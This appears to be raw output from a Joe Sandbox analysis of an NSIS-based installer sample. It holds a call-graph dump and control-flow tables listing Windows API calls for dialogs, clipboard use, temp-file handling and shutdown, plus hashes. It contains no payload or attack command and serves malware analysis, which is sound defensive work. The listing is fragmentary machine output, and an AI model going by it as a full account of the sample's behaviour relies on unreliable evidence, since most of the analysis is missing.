GetShortPathNameW 3806->3828 3806->3840 3807->3806 3835 4062d5 2 API calls 3807->3835 3808 4062a3 11 API calls 3818 4017c9 3808->3818 3820 4018eb 3811->3820 3821 401627 3812->3821 3822 401664 3813->3822 3823 401785 SetFileAttributesW 3814->3823 3816 401683 3815->3816 3833 404f72 25 API calls 3816->3833 3879 405d59 CharNextW CharNextW 3818->3879 3829 40145c 18 API calls 3820->3829 3830 404f72 25 API calls 3821->3830 3831 40139d 65 API calls 3822->3831 3832 40179a 3823->3832 3823->3840 3824 4018c2 3836 4062a3 11 API calls 3824->3836 3825 4018a9 3834 4062a3 11 API calls 3825->3834 3828->3840 3837 4018f5 3829->3837 3830->3840 3831->3840 3838 4062a3 11 API calls 3832->3838 3833->3840 3834->3840 3839 401991 3835->3839 3836->3840 3842 4062a3 11 API calls 3837->3842 3838->3840 3839->3806 3889 406009 lstrcpynW 3839->3889 3840->3759 3841 401864 3841->3816 3845 40186e 3841->3845 3844 401902 MoveFileW 3842->3844 3843 405d06 CharNextW 3847 4017e6 CreateDirectoryW 3843->3847 3848 401912 3844->3848 3849 40191e 3844->3849 3850 404f72 25 API calls 3845->3850 3851 4017fe GetLastError 3847->3851 3861 4017d4 3847->3861 3848->3816 3855 4062d5 2 API calls 3849->3855 3867 401942 3849->3867 3852 401875 3850->3852 3853 401827 GetFileAttributesW 3851->3853 3854 40180b GetLastError 3851->3854 3885 406009 lstrcpynW 3852->3885 3853->3861 3857 4062a3 11 API calls 3854->3857 3858 401929 3855->3858 3857->3861 3864 406c68 42 API calls 3858->3864 3858->3867 3859 401882 SetCurrentDirectoryW 3859->3840 3860 4062a3 11 API calls 3863 40195c 3860->3863 3861->3841 3861->3843 3862 4062a3 11 API calls 3861->3862 3862->3861 3863->3840 3865 401936 3864->3865 3866 404f72 25 API calls 3865->3866 3866->3867 3867->3860 3869 406805 18 API calls 3868->3869 3870 401455 3869->3870 3870->3796 3872 4060e7 9 API calls 3871->3872 3873 4016a7 Sleep 3872->3873 3873->3840 3875 406805 18 API calls 3874->3875 3876 401488 3875->3876 3877 401497 3876->3877 3878 406038 5 API calls 3876->3878 3877->3808 3878->3877 3880 405d76 3879->3880 3881 405d88 3879->3881 3880->3881 3882 405d83 CharNextW 3880->3882 3883 405d06 CharNextW 3881->3883 3884 405dac 3881->3884 3882->3884 3883->3881 3884->3861 3885->3859 3887 4018a5 3886->3887 3888 4062eb FindClose 3886->3888 3887->3824 3887->3825 3888->3887 3889->3806 3890->3840 3891->3749 3893 403c91 3892->3893 3894 403c96 FreeLibrary GlobalFree 3893->3894 3895 403876 3893->3895 3894->3894 3894->3895 3896 406c9b 3895->3896 3897 40677e 18 API calls 3896->3897 3898 406cae 3897->3898 3899 406cb7 DeleteFileW 3898->3899 3900 406cce 3898->3900 3941 403882 CoUninitialize 3899->3941 3901 406e4b 3900->3901 3944 406009 lstrcpynW 3900->3944 3904 406e58 3901->3904 3908 4062d5 2 API calls 3901->3908 3901->3941 3903 406cf9 3905 406d03 lstrcatW 3903->3905 3906 406d0d 3903->3906 3913 4062a3 11 API calls 3904->3913 3907 406d13 3905->3907 3909 406751 2 API calls 3906->3909 3911 406d23 lstrcatW 3907->3911 3912 406d19 3907->3912 3910 406e64 3908->3910 3909->3907 3915 406722 3 API calls 3910->3915 3910->3941 3914 406d2b lstrlenW FindFirstFileW 3911->3914 3912->3911 3912->3914 3913->3941 3916 406e3b 3914->3916 3930 406d52 3914->3930 3918 406e6e 3915->3918 3916->3901 3917 405d06 CharNextW 3917->3930 3919 4062a3 11 API calls 3918->3919 3920 406e79 3919->3920 3921 405e30 2 API calls 3920->3921 3922 406e81 RemoveDirectoryW 3921->3922 3926 406ec4 3922->3926 3927 406e8d 3922->3927 3923 406e18 FindNextFileW 3925 406e30 FindClose 3923->3925 3923->3930 3925->3916 3928 404f72 25 API calls 3926->3928 3927->3904 3929 406e93 3927->3929 3928->3941 3932 4062a3 11 API calls 3929->3932 3930->3917 3930->3923 3931 4062a3 11 API calls 3930->3931 3934 406c9b 72 API calls 3930->3934 3940 404f72 25 API calls 3930->3940 3942 404f72 25 API calls 3930->3942 3943 406c68 42 API calls 3930->3943 3945 406009 lstrcpynW 3930->3945 3946 405e30 GetFileAttributesW 3930->3946 3931->3930 3933 406e9d 3932->3933 3936 404f72 25 API calls 3933->3936 3934->3930 3938 406ea7 3936->3938 3939 406c68 42 API calls 3938->3939 3939->3941 3940->3923 3941->3417 3941->3418 3942->3930 3943->3930 3944->3903 3945->3930 3947 405e4d DeleteFileW 3946->3947 3948 405e3f SetFileAttributesW 3946->3948 3947->3930 3948->3947 3949->3580 3950->3604 3951->3612 3952->3612 3953->3613 3955 406ae7 GetShortPathNameW 3954->3955 3956 406abe 3954->3956 3958 406b00 3955->3958 3959 406c62 3955->3959 3980 405e50 GetFileAttributesW CreateFileW 3956->3980 3958->3959 3961 406b08 WideCharToMultiByte 3958->3961 3959->3633 3960 406ac7 CloseHandle GetShortPathNameW 3960->3959 3962 406adf 3960->3962 3961->3959 3963 406b25 WideCharToMultiByte 3961->3963 3962->3955 3962->3959 3963->3959 3964 406b3d wsprintfA 3963->3964 3965 406805 18 API calls 3964->3965 3966 406b69 3965->3966 3981 405e50 GetFileAttributesW CreateFileW 3966->3981 3968 406b76 3968->3959 3969 406b83 GetFileSize GlobalAlloc 3968->3969 3970 406ba4 ReadFile 3969->3970 3971 406c58 CloseHandle 3969->3971 3970->3971 3972 406bbe 3970->3972 3971->3959 3972->3971 3982 405db6 lstrlenA 3972->3982 3975 406bd7 lstrcpyA 3978 406bf9 3975->3978 3976 406beb 3977 405db6 4 API calls 3976->3977 3977->3978 3979 406c30 SetFilePointer WriteFile GlobalFree 3978->3979 3979->3971 3980->3960 3981->3968 3983 405df7 lstrlenA 3982->3983 3984 405dd0 lstrcmpiA 3983->3984 3985 405dff 3983->3985 3984->3985 3986 405dee CharNextA 3984->3986 3985->3975 3985->3976 3986->3983 4851 402a84 4852 401553 19 API calls 4851->4852 4853 402a8e 4852->4853 4854 401446 18 API calls 4853->4854 4855 402a98 4854->4855 4856 401a13 4855->4856 4857 402ab2 RegEnumKeyW 4855->4857 4858 402abe RegEnumValueW 4855->4858 4859 402a7e 4857->4859 4858->4856 4858->4859 4859->4856 4860 4029e4 RegCloseKey 4859->4860 4860->4856 4861 402c8a 4862 402ca2 4861->4862 4863 402c8f 4861->4863 4865 40145c 18 API calls 4862->4865 4864 401446 18 API calls 4863->4864 4867 402c97 4864->4867 4866 402ca9 lstrlenW 4865->4866 4866->4867 4868 402ccb WriteFile 4867->4868 4869 401a13 4867->4869 4868->4869 4870 40400d 4871 40401a lstrcpynA lstrlenA 4870->4871 4872 40406a 4870->4872 4871->4872 4873 40404b 4871->4873 4873->4872 4874 404057 GlobalFree 4873->4874 4874->4872 4875 401d8e 4876 40145c 18 API calls 4875->4876 4877 401d95 ExpandEnvironmentStringsW 4876->4877 4878 401da8 4877->4878 4880 401db9 4877->4880 4879 401dad lstrcmpW 4878->4879 4878->4880 4879->4880 4881 401e0f 4882 401446 18 API calls 4881->4882 4883 401e17 4882->4883 4884 401446 18 API calls 4883->4884 4885 401e21 4884->4885 4886 4030e3 4885->4886 4888 405f51 wsprintfW 4885->4888 4888->4886 4889 402392 4890 40145c 18 API calls 4889->4890 4891 402399 4890->4891 4894 4071f8 4891->4894 4895 406ed2 25 API calls 4894->4895 4896 407218 4895->4896 4897 407222 lstrcpynW lstrcmpW 4896->4897 4898 4023a7 4896->4898 4899 407254 4897->4899 4900 40725a lstrcpynW 4897->4900 4899->4900 4900->4898 3987 402713 4002 406009 lstrcpynW 3987->4002 3989 40272c 4003 406009 lstrcpynW 3989->4003 3991 402738 3992 402743 3991->3992 3993 40145c 18 API calls 3991->3993 3994 402752 3992->3994 3995 40145c 18 API calls 3992->3995 3993->3992 3996 40145c 18 API calls 3994->3996 3998 402761 3994->3998 3995->3994 3996->3998 3997 40145c 18 API calls 3999 40276b 3997->3999 3998->3997 4000 4062a3 11 API calls 3999->4000 4001 40277f WritePrivateProfileStringW 4000->4001 4002->3989 4003->3991 4901 402797 4902 40145c 18 API calls 4901->4902 4903 4027ae 4902->4903 4904 40145c 18 API calls 4903->4904 4905 4027b7 4904->4905 4906 40145c 18 API calls 4905->4906 4907 4027c0 GetPrivateProfileStringW lstrcmpW 4906->4907 4908 402e18 4909 40145c 18 API calls 4908->4909 4910 402e1f FindFirstFileW 4909->4910 4911 402e32 4910->4911 4916 405f51 wsprintfW 4911->4916 4913 402e43 4917 406009 lstrcpynW 4913->4917 4915 402e50 4916->4913 4917->4915 4918 401e9a 4919 40145c 18 API calls 4918->4919 4920 401ea1 4919->4920 4921 401446 18 API calls 4920->4921 4922 401eab wsprintfW 4921->4922 4214 401a1f 4215 40145c 18 API calls 4214->4215 4216 401a26 4215->4216 4217 4062a3 11 API calls 4216->4217 4218 401a49 4217->4218 4219 401a64 4218->4219 4220 401a5c 4218->4220 4268 406009 lstrcpynW 4219->4268 4267 406009 lstrcpynW 4220->4267 4223 401a62 4227 406038 5 API calls 4223->4227 4224 401a6f 4225 406722 3 API calls 4224->4225 4226 401a75 lstrcatW 4225->4226 4226->4223 4249 401a81 4227->4249 4228 4062d5 2 API calls 4228->4249 4229 405e30 2 API calls 4229->4249 4231 401a98 CompareFileTime 4231->4249 4232 401ba9 4233 404f72 25 API calls 4232->4233 4235 401bb3 4233->4235 4234 404f72 25 API calls 4236 401b70 4234->4236 4237 40337f 37 API calls 4235->4237 4240 4062a3 11 API calls 4236->4240 4238 401bc6 4237->4238 4241 4062a3 11 API calls 4238->4241 4239 406009 lstrcpynW 4239->4249 4264 401b8b 4240->4264 4242 401bda 4241->4242 4243 401be9 SetFileTime 4242->4243 4244 401bf8 CloseHandle 4242->4244 4243->4244 4246 401c09 4244->4246 4244->4264 4245 406805 18 API calls 4245->4249 4247 401c21 4246->4247 4248 401c0e 4246->4248 4251 406805 18 API calls 4247->4251 4250 406805 18 API calls 4248->4250 4249->4228 4249->4229 4249->4231 4249->4232 4249->4239 4249->4245 4252 405ca0 MessageBoxIndirectW 4249->4252 4256 401b50 4249->4256 4258 4062a3 11 API calls 4249->4258 4265 401b5d 4249->4265 4266 405e50 GetFileAttributesW CreateFileW 4249->4266 4253 401c16 lstrcatW 4250->4253 4254 401c29 4251->4254 4252->4249 4253->4254 4255 4062a3 11 API calls 4254->4255 4257 401c34 4255->4257 4259 401b93 4256->4259 4260 401b53 4256->4260 4261 405ca0 MessageBoxIndirectW 4257->4261 4258->4249 4262 4062a3 11 API calls 4259->4262 4263 4062a3 11 API calls 4260->4263 4261->4264 4262->4264 4263->4265 4265->4234 4266->4249 4267->4223 4268->4224 4923 40209f GetDlgItem GetClientRect 4924 40145c 18 API calls 4923->4924 4925 4020cf LoadImageW SendMessageW 4924->4925 4926 4030e3 4925->4926 4927 4020ed DeleteObject 4925->4927 4927->4926 4928 402b9f 4929 401446 18 API calls 4928->4929 4932 402ba7 4929->4932 4930 401446 18 API calls 4939 402c3d 4930->4939 4931 402bdf ReadFile 4931->4932 4931->4939 4932->4931 4933 402c06 MultiByteToWideChar 4932->4933 4934 402c3f 4932->4934 4935 402c4f 4932->4935 4932->4939 4940 402c4a 4932->4940 4933->4932 4933->4935 4941 405f51 wsprintfW 4934->4941 4937 402c6b SetFilePointer 4935->4937 4935->4939 4937->4939 4938 402d17 ReadFile 4938->4939 4939->4930 4939->4938 4939->4940 4941->4940 4942 402b23 GlobalAlloc 4943 402b39 4942->4943 4944 402b4b 4942->4944 4945 401446 18 API calls 4943->4945 4946 40145c 18 API calls 4944->4946 4948 402b41 4945->4948 4947 402b52 WideCharToMultiByte lstrlenA 4946->4947 4947->4948 4949 402b84 WriteFile 4948->4949 4951 402b93 4948->4951 4950 402384 GlobalFree 4949->4950 4949->4951 4950->4951 4953 4044a5 4954 404512 4953->4954 4955 4044df 4953->4955 4956 40451f GetDlgItem GetAsyncKeyState 4954->4956 4964 4045b1 4954->4964 5021 405c84 GetDlgItemTextW 4955->5021 4958 40453e GetDlgItem 4956->4958 4972 40455c 4956->4972 4961 403d3f 19 API calls 4958->4961 4959 40469d 4963 404833 4959->4963 5023 405c84 GetDlgItemTextW 4959->5023 4960 4044ea 4962 406038 5 API calls 4960->4962 4967 404551 ShowWindow 4961->4967 4965 4044f0 4962->4965 4971 403dca 8 API calls 4963->4971 4964->4959 4964->4963 4970 406805 18 API calls 4964->4970 4968 403e74 5 API calls 4965->4968 4967->4972 4973 4044f5 GetDlgItem 4968->4973 4969 4046c9 4974 40677e 18 API calls 4969->4974 4975 40462f SHBrowseForFolderW 4970->4975 4976 404847 4971->4976 4977 404579 SetWindowTextW 4972->4977 4982 405d59 4 API calls 4972->4982 4973->4963 4978 404503 IsDlgButtonChecked 4973->4978 4980 4046cf 4974->4980 4975->4959 4981 404647 CoTaskMemFree 4975->4981 4979 403d3f 19 API calls 4977->4979 4978->4954 4983 404597 4979->4983 5024 406009 lstrcpynW 4980->5024 4984 406722 3 API calls 4981->4984 4985 40456f 4982->4985 4986 403d3f 19 API calls 4983->4986 4987 404654 4984->4987 4985->4977 4989 406722 3 API calls 4985->4989 4990 4045a2 4986->4990 4991 40468b SetDlgItemTextW 4987->4991 4996 406805 18 API calls 4987->4996 4989->4977 5022 403d98 SendMessageW 4990->5022 4991->4959 4992 4046e6 4994 4062fc 3 API calls 4992->4994 5004 4046ee 4994->5004 4995 4045aa 4997 4062fc 3 API calls 4995->4997 4998 404673 lstrcmpiW 4996->4998 4997->4964 4998->4991 5001 404684 lstrcatW 4998->5001 4999 404730 5025 406009 lstrcpynW 4999->5025 5001->4991 5002 404739 5003 405d59 4 API calls 5002->5003 5005 40473f GetDiskFreeSpaceW 5003->5005 5004->4999 5007 406751 2 API calls 5004->5007 5009 404785 5004->5009 5008 404763 MulDiv 5005->5008 5005->5009 5007->5004 5008->5009 5010 4047e2 5009->5010 5011 4043ad 21 API calls 5009->5011 5012 404805 5010->5012 5013 40141d 80 API calls 5010->5013 5014 4047d3 5011->5014 5026 403d85 KiUserCallbackDispatcher 5012->5026 5013->5012 5016 4047e4 SetDlgItemTextW 5014->5016 5017 4047d8 5014->5017 5016->5010 5019 4043ad 21 API calls 5017->5019 5018 404821 5018->4963 5027 403d61 5018->5027 5019->5010 5021->4960 5022->4995 5023->4969 5024->4992 5025->5002 5026->5018 5028 403d74 SendMessageW 5027->5028 5029 403d6f 5027->5029 5028->4963 5029->5028 5030 402da5 5031 402dac 5030->5031 5033 4030e3 5030->5033 5032 401446 18 API calls 5031->5032 5034 402db8 5032->5034 5035 402dbf SetFilePointer 5034->5035 5035->5033 5036 402dcf 5035->5036 5036->5033 5038 405f51 wsprintfW 5036->5038 5038->5033 5039 401cb2 5040 40145c 18 API calls 5039->5040 5041 401c54 5040->5041 5042 4062a3 11 API calls 5041->5042 5043 401c64 5041->5043 5044 401c59 5042->5044 5045 406c9b 81 API calls 5044->5045 5045->5043 4014 4021b5 4015 40145c 18 API calls 4014->4015 4016 4021bb 4015->4016 4017 40145c 18 API calls 4016->4017 4018 4021c4 4017->4018 4019 40145c 18 API calls 4018->4019 4020 4021cd 4019->4020 4021 40145c 18 API calls 4020->4021 4022 4021d6 4021->4022 4023 404f72 25 API calls 4022->4023 4024 4021e2 ShellExecuteW 4023->4024 4025 40220d 4024->4025 4028 40221b 4024->4028 4026 4062a3 11 API calls 4025->4026 4026->4028 4027 4062a3 11 API calls 4029 402230 4027->4029 4028->4027 5053 402238 5054 40145c 18 API calls 5053->5054 5055 40223e 5054->5055 5056 4062a3 11 API calls 5055->5056 5057 40224b 5056->5057 5058 404f72 25 API calls 5057->5058 5059 402255 5058->5059 5060 405c3f 2 API calls 5059->5060 5061 40225b 5060->5061 5062 4022ac CloseHandle 5061->5062 5063 4062a3 11 API calls 5061->5063 5067 4030e3 5062->5067 5065 40226d 5063->5065 5065->5062 5066 402283 WaitForSingleObject 5065->5066 5069 406332 2 API calls 5065->5069 5066->5065 5068 402291 GetExitCodeProcess 5066->5068 5068->5062 5070 4022a3 5068->5070 5069->5066 5072 405f51 wsprintfW 5070->5072 5072->5062 4123 401eb9 4124 401f24 4123->4124 4125 401ec6 4123->4125 4126 401f53 GlobalAlloc 4124->4126 4127 401f28 4124->4127 4128 401ed5 4125->4128 4134 401ef7 4125->4134 4129 406805 18 API calls 4126->4129 4130 401f36 4127->4130 4133 4062a3 11 API calls 4127->4133 4131 4062a3 11 API calls 4128->4131 4132 401f46 4129->4132 4147 406009 lstrcpynW 4130->4147 4142 401ee2 4131->4142 4136 402387 GlobalFree 4132->4136 4144 402708 4132->4144 4133->4130 4145 406009 lstrcpynW 4134->4145 4136->4144 4138 401f06 4146 406009 lstrcpynW 4138->4146 4139 406805 18 API calls 4139->4142 4141 401f15 4148 406009 lstrcpynW 4141->4148 4142->4139 4142->4144 4145->4138 4146->4141 4147->4132 4148->4144 5073 4074bb 5074 407344 5073->5074 5075 407c6d 5074->5075 5076 4073c2 GlobalFree 5074->5076 5077 4073cb GlobalAlloc 5074->5077 5078 407443 GlobalAlloc 5074->5078 5079 40743a GlobalFree 5074->5079 5076->5077 5077->5074 5077->5075 5078->5074 5078->5075 5079->5078

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                          • GetClientRect.USER32(?,?), ref: 00405196
                                                          • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                          • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                            • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                          • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                          • ShowWindow.USER32(00000000), ref: 004052E7
                                                          • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                          • ShowWindow.USER32(00000008), ref: 00405333
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                          • CreatePopupMenu.USER32 ref: 00405376
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                          • GetWindowRect.USER32(?,?), ref: 0040539E
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                          • OpenClipboard.USER32(00000000), ref: 0040540B
                                                          • EmptyClipboard.USER32 ref: 00405411
                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                          • CloseClipboard.USER32 ref: 0040546E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                          • String ID: @rD$New install of "%s" to "%s"${
                                                          • API String ID: 2110491804-2409696222
                                                          • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                          • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                          • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                          • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 321 4039f5-403a0d GetTempPathW call 4037cc 317->321 319 403944-40394a 318->319 320 40394c-403950 318->320 319->319 319->320 323 403952-403957 320->323 324 403958-40395c 320->324 328 403a33-403a4d DeleteFileW call 403587 321->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 321->329 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 341 4039c7 326->341 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 336 403970-403973 331->336 337 403975 331->337 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 336->332 336->337 337->332 341->316 343->326 359 4039d8-4039f0 call 407d6e call 406009 343->359 348 403997-40399a 344->348 349 40399c 344->349 357 403ae1-403af1 call 405ca0 ExitProcess 345->357 358 403bce-403bd4 345->358 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 361 403ac1-403ac7 call 4060e7 351->361 364 403a79-403a7b 352->364 366 403c51-403c59 358->366 367 403bd6-403bf3 call 4062fc * 3 358->367 359->321 361->345 369 403a62-403a74 call 403800 364->369 370 403a7d-403a87 364->370 371 403c5b 366->371 372 403c5f 366->372 396 403bf5-403bf7 367->396 397 403c3d-403c48 ExitWindowsEx 367->397 369->370 384 403a76 369->384 376 403af7-403b11 lstrcatW lstrcmpiW 370->376 377 403a89-403a99 call 40677e 370->377 371->372 376->345 382 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 376->382 377->345 390 403a9b-403ab1 call 406009 * 2 377->390 387 403b36-403b56 call 406009 * 2 382->387 388 403b2b-403b31 call 406009 382->388 384->364 407 403b5b-403b77 call 406805 DeleteFileW 387->407 388->387 390->351 396->397 401 403bf9-403bfb 396->401 397->366 400 403c4a-403c4c call 40141d 397->400 400->366 401->397 405 403bfd-403c0f GetCurrentProcess 401->405 405->397 413 403c11-403c33 405->413 411 403bb8-403bc0 407->411 412 403b79-403b89 CopyFileW 407->412 411->407 415 403bc2-403bc9 call 406c68 411->415 412->411 414 403b8b-403bab call 406c68 call 406805 call 405c3f 412->414 413->397 414->411 425 403bad-403bb4 CloseHandle 414->425 415->345 425->411
                                                          APIs
                                                          • #17.COMCTL32 ref: 004038A2
                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                          • OleInitialize.OLE32(00000000), ref: 004038B4
                                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                          • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                          • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                          • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                          • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                          • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                          • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                          • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                          • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                          • ExitProcess.KERNEL32 ref: 00403AF1
                                                          • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                          • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                          • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                          • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                          • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                          • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                          • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
